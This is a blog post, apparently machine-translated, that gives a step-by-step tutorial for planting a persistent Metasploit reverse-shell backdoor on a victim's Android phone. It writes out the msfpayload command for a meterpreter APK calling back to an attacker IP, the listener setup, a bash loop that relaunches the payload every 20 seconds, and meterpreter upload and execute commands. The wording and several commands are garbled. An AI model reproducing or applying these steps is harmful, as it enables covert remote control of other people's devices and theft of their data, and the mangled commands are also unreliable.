Ticker

6/recent/ticker-posts

Header Ads Widget

Create a Persistent Back Door in Android Using Kali Linux Hack any Android



In this tutorial I will show you how to make the backdoor we have created in my guide here continue.

I finally found a way to do this, as I was / was very poor in bash scripting, it took me a lot of time (20hrs approx.) To make the script work and work, thanks to the green syntaxes I found on other sites.

Step 1: Fire Up Kali and Hack Android system:

Use this guide to hack an Android app on the LAN.

I will be breaking the WAN, using a VM.

Lets Create a back door by typing:

  • msfpayload android /meterpreter/reverse_tcp LHOST = 182.68.42.6 R> /root/abcde.apk



  • Now, allow to set the listener:
  • msfconsole
  • use exploit /multi/handler
  • set android /meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit



After user/victim installation and opening abcde.apk, Meterpreter Rising ...

Don't MissHow to Open Somebody's Computer Without a Password (Setting Up the Payload)

Step 2: Create Persistent Script:

Here .. Copy these instructions to the script to build the script, and save it as anything.sh (File extension .sh is important!)


#!/bin/bash

while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage / .MainActivity

sleep 20

done


(There is no line difference in the 3rd and 4th lines, they are single line)

(The first line #! /Bin/bash is also important as you see the script as bash Shell text)

(You can set to sleep for any number of seconds you want the script to sleep)



Move / Copy this to the Home/Root folder of kali.


Updated script v3 (Compatible with any version of Android)

IMPORTANT: DO NOT COPY / PASTE THE SCRIPT DIRECTLY, OR  IT DOESN'T WORK /! \

..I think you will have to write it yourself .. (Don't ask me why ..)

Code:

#!/bin/bash

while:

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done


There is a 'space' between 'while' and ':'

No Multiple spaces in the script.

NO Line Break between 3rd and 4th lines. (So ​​5 lines in total)

Step 3: Upload it to Android Hacking System:

You need to upload the Shell script to etc/init.d/ to persist or after a restart!

To do this, navigate to the index using the following instructions:

  • cd/

You should now be in the ROOT directory, you can check by typing:

  • ls



Now type:

  • cd etc

Check back by typing:

  • ls



Also change directory:

  • cd init.d
  • ls



Here we are ...

Time to Upload the Shell script

Do this by typing:

  • upload anything.sh



What The **** ? No! We need Root Access to complete this command! Dammm!

Don't MissHack any Computer Over Wi-Fi with the WiFi Duck Payload Deliverer

Stop:

> Let's just make the application (eg Main Activity) presistent until the restart

> However, it will not persist after the Android app on Victim goes to reboot.

> To do this upload script anywhere on sdcard:

  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh



Done! Uploaded!

Step 4: Execute the script:

Now, all we have to do is run the script once, and then all will be done by text automatically.

Drop in to the shell of the application by typing:

  • shell

Now, navigate to the location of the Script:

  • cd /
  • cd /sdcard/Download
  • ls

Now is the time for Execution. Type:

  • sh anything.sh



Script Activated! All you have to do is press ctrl + C to Stop the shell (Don't worry the script is still in progress)

Restart to Eliminate the script or use Task Killer

Step 5: Testing ...

You can check it by exiting the meterpreter and setting the listener.

You should get a meterpreter immediately!

Proof:



WOW! It happened so fast that 3 Sessions opened in a row.

(I know the picture above shows that I am breaking the LAN instead of the WAN as my Public IP is strong and my router has some technical problems, so it keeps updating itself, so I showed the LAN, BUT there are no problems I checked in -WAN, works well)

Conclusion:

Yes! Finally a persistent backdoor is successfully designed for Android applications.

Don't MissHow to Hack Facebook Without Phishing SOP (Same Origin Policy)

Things to Remember:

  • Background persistence will only remain until the Android system restart.
  • If you hack into the WAN and have a strong Public IP, then, the persistence will only last until your router restarts / your IP changes.
  • Remember to restart the android to complete the active script, when checking yourself on your Android System.
  • If the Victim Android system is rooted and your Public IP is Static, then:

1) Persistence will Remain forever on the WAN!

2) Persistence will remain forever on the LAN Obviously

Say goodbye to the Hackers!

Keep Comming for More!

I will be Waiting for Your Comments and Likes

Thank you.

Post a comment

0 Comments